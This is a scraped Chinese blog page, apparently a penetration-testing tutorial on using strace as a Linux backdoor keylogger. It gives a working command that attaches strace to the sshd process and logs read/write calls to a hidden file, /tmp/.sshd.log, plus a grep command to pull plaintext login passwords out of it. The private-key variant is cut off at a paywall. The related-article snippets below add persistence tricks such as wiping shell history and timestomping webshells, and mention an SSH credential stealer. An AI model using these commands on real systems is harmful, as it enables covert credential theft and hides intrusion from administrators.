linux后门之strace后门键盘记录

最新推荐文章于 2025-04-03 10:03:13 发布

渗透测试教程

最新推荐文章于 2025-04-03 10:03:13 发布

阅读量1.2k

点赞数

分类专栏：内网渗透文章标签：网络安全信息安全渗透测试

本文链接：https://blog.youkuaiyun.com/qq_34923966/article/details/113917207

版权

本文介绍了如何使用strace工具创建一个键盘记录后门，以追踪和记录Linux系统的sshd进程密码、私钥及ssh登录凭证，从而在渗透测试中获取更多信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

介绍

strace是一个动态跟踪工具，它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门，来扩大我们的信息收集范围

使用场景

通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。我们想要获取当前主机的密码，或者通过这台主机连接到其他主机的密码。

记录sshd进程明文密码

执行如下命令

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)、

当用户通过密码登录时，使用如下命令查看记录的密码

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

记录sshd私钥

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v g

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

渗透测试教程

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
4
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

linux下键盘记录程序,书写基于内核的linux键盘纪录器（三）

weixin_34603379的博客

05-01

729

3 - 基于内核的键盘纪录器的实现步骤我们论述两种实现方法,一个是书写我们自己的键盘中断句柄,另一个是劫持输入进程函数.----[ 3.1 - 中断句柄要纪录击键信息,我们就要利用我们自己的键盘中断。在Intel体系下，控制键盘的IRQ值是1。当接受到一个键盘中断时，我们的键盘中断器会读取scancode和键盘的状态。读写键盘事件都是通过0x60端口(键盘数据注册器)和0x64(键盘状态注册器)来...

linux权限维持

whojoe的博客

10-08

551

修改属性文件时间 touch -r index.php shell.php touch -t 202010101010 shell.php #touch --help 历史操作命令 histroy -r #删除当前会话历史记录 history -c #删除内存中的所有命令历史 rm .bash_history #删除历史文件中的内容 sed -i '150,$d' .bash_history#只保留前150行 set +o history#针对你的工作关闭历史记录 set -o history#恢复 e

4 条评论您还未登录，请先登录后发表或查看评论

监控linux终端键盘输入,Linux内核实时监控键盘输入

weixin_35057850的博客

05-09

371

刚毕业那会儿，VC6学习MFC，总得来点儿好玩的东西才能继续下去，毕竟不是科班出身，得完全靠意义去驱动…那个时候认识了键盘钩子，鼠标钩子之类：https://blog.youkuaiyun.com/dog250/article/details/5303610这种方法貌似还可以盗号…只是QQ早就解决了这个问题。不说Windows钩子了，说说Linux系统中如何监控键盘输入，这简直太简单了。hook n_tty_...

SSH-Stealer：智能窃取SSH凭据的关键功能

最新发布

gitblog_00701的博客

04-03

797

SSH-Stealer：智能窃取SSH凭据的关键功能 SSH-Stealer Smart keylogging capability to steal SSH Credentials including password & Private Key ...

用strace找ssh后门

cnbird's blog

06-10

838

首先我先编译一个ssh后门，这个ssh后门会在/tmp/xxxxxx记录所有的登录密码启动他QUOTE:root@laptop:/usr/local/openssh2/sbin# ps aux | grep sshdroot 13619 0.0 0.3 7432 1752 ? Ss 23:44 0:00 ./sshd -p 1234r

操作系统权限维持（十四）之Linux系统- Strace监听SSH来源流量记录密码后门

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

03-28

1548

现在我们去/tmp/.ssh.log文件中查找密码，发现了之前我们输入的连接密码123456，（.ssh.log文件中由于记录的流量信息比较多，所以查找起密码来可能比较麻烦和费时间）之前有用别名的方式来抓取登陆其他机器时的密码、同样也可以利用strace来监听登陆本地的sshd流量。此时我们任何使用ssh登录或者切换用户的操作，密码都会被记录到/tmp/.ssh.log文件中。这里我们用ssh以root身份连接到本机，以模仿用户ssh远程连接时的场景。当我们执行完后会发现之前的窗口已经在抓取流量了。

利用strace找出ssh后门

weixin_33797791的博客

09-30

258

首先我先编译一个ssh后门，这个ssh后门会在/tmp/xxxxxx记录所有的登录密码启动他QUOTE:1root@laptop:/usr/local/openssh2/sbin# ps aux | grep sshd23root 13619 0.0 0.3 7432 1752 ? Ss 23:44 0:00 ./sshd -p 123445root 13707 0.0 0....

权限维持Linux---监控功能Strace后门&命令自定义Alias后门

金灰的博客

07-03

675

(将命令进行别名自定义)alias 命令的功能：为命令设置别名定义：alias ls='ls -al'去掉别名：unalias ls每次输入 ls 命令的时候都能实现 ls -al缺点:虽然好用,但是靶机重启就会失效!!!

阿一网络安全学院干货科普篇之应急响应【上】

qq_69775412的博客

06-17

1282

安全人员在遇到突发事件后所采取的措施和行动。发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。信息安全生命周期的必要组成部分，这个生命周期包括：对策、检测和响应。运维人员无法迅速处理安全事件时，需要第三方厂商提供一种能发现并解决问题的有效服务手段。控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。以最快速度恢复系统的保密性、完整性和可用性，阻止和减小安全事件带来的影响。积极预防、及时发现、快速反应、确保恢复。

wazuh

Devotedakura的博客

08-20

2274

Wazuh 是一个免费、开源和企业级的安全监控解决方案，用于威胁检测、完整性监控、事件响应和合规性。Wazuh由部署到受监视系统的端点安全代理和管理服务器组成，管理服务器收集和分析代理收集的数据。此外，Wazuh已与Elastic Stack完全集成，提供了搜索引擎和数据可视化工具，使用户可以浏览其安全警报。Wazuh提供的功能包括日志数据分析，入侵和恶意软件检测，文件完整性监视，配置评估，漏洞检测以及对法规遵从性的支持。对于日志来说，最常见的需求就是收集、存储、查询、展示，

红队作业 | 收集xxx.com域名的所有子域名

Ms08067安全实验室

01-10

4500

文章来源｜MS08067 红队培训班第5期本文作者：AlexD（红队培训班5期学员）按老师要求尝试完成布置的作业如下：被动信息收集0x01 利用DNS数据集收集子域有很多第三方服务聚合...

如何用strace找出ssh后门

黑火的专栏

03-24

1046

首先我先编译一个ssh后门，这个ssh后门会在/tmp/xxxxxx记录所有的登录密码　　启动他　　QUOTE: 　　root@laptop:/usr/local/openssh2/sbin# ps aux | grep sshd 　　root 13619 0.0 0.3 7432 1752 ? Ss 23:44 0:00 ./sshd -p 1234 　　roo

linux 查找木马文件,linux快速查找木马后门的办法

weixin_29229261的博客

04-29

896

8种机械键盘轴体对比本人程序员，要买一个写代码的键盘，请问红轴和茶轴怎么选？webshell后门我相信大家都见过，站长也都清理过木马。今天分享一个快速查找的办法：木马里面常用的php函数：set_time_limit(禁止报错)定义和用法error_reporting() 函数跪地你给应该报告何种 PHP 错误。error_reporting() 函数能够在运行时设置 error_reporti...

linux获取ssh键盘记录软件,通过SSH连接时，如何从主机键盘读取输入？

weixin_31813357的博客

05-08

640

我目前正在尝试模拟键盘的RFID读卡器。连接卡时，它将从卡中读取数据，然后根据配置模拟击键。我已将此设备连接到Raspberry Pi，并通过SSH连接到Raspberry Pi。显然，当读者现在模拟击键时，它们落在Pi的本地tty上(而不是在我的SSH会话中)。因此，我现在很难获得该输入。最终，我将编写一个软件来处理输入，但是出于调试和开发目的，在SSH会话中获取键盘输入将非常有帮助。我尝试了以...

Linux/unix 键盘记录 ixkeylog

G11176593的博客

10-22

528

源代码可以在这里找到。

linux 键盘记录,Linux键盘记录sh2log keylogger notes

weixin_39681161的博客

05-15

184

make linuxmake freebsdmake openbsdmake cygwinmake sunosmake irixmake hpuxmake aixmake osf如下:[root@Centos sh2log-1.0]# make linuxgcc -g -W -Wall -o sh2log rc4.c sha1.c sh2log.c -lutil -DLINUXgcc -g -W ...

远程登录记录键盘***

weixin_34306446的博客

07-08

170

发现一台服务器的网站文件都被篡改了，asp文件都被添加了某诈骗网站的链接文件；当远程登录时会在windows/system32下产生一个edit.hlp的文件；里面记录了登录的帐号和密码；寻找了一段，只发现为explorer创建的；但是却找不到有***的迹象；继续寻找中； 7.28通过macfee发现了被上传过一个2003.rar里面有 instal...

linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录

weixin_28747937的博客

05-15

918

环境：攻击机：192.168.200.101 //kali Linux 2020靶机：192.168.200.103 (未打MS17-010补丁windowsServices2008.x64)1：msfconsole //进入me...